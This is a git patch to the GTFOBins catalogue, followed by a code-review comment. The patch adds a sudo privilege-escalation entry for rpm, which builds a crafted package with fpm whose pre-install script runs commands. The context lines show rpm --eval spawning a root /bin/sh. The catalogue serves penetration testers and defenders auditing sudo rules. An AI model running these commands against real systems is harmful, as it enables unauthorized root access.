From a0674eb8f0146997578ed4ba84e51d652a5e059e Mon Sep 17 00:00:00 2001 From: Emilio Date: Sat, 2 Feb 2019 15:54:57 +0000 Subject: [PATCH] Add other sudo to rpm thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ as in #51 --- _gtfobins/rpm.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 6e56eb0..6ef60ae 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -6,4 +6,13 @@ functions: - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo: - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - description: | + It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. + ``` + TF=$(mktemp -d) + echo 'id' > $TF/x.sh + fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF + ``` + code: | + sudo rpm -ivh x-1.0-1.noarch.rpm ---
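Review bot: The `code:` line of the new `sudo` entry installs `x-1.0-1.noarch.rpm`, but the `fpm` command in the description sets no version, iteration or output path, so that file name is only implied by fpm's defaults. State the expected output name in the description, or set it explicitly in the `fpm` line, so the two halves of the entry cannot drift apart. In the same snippet `$TF` is unquoted in `echo 'id' > $TF/x.sh` and in the `fpm` arguments; write it as `"$TF"`. The description should also say in one clause that the build step runs on a separate machine where fpm is installed, since "upload it to the target" is the only hint of that. Finally, the subject line credits an article about apt-get, apt and dpkg while the diff only touches `_gtfobins/rpm.md`; a short note in the commit body on how that article applies to rpm would help whoever reads the history later.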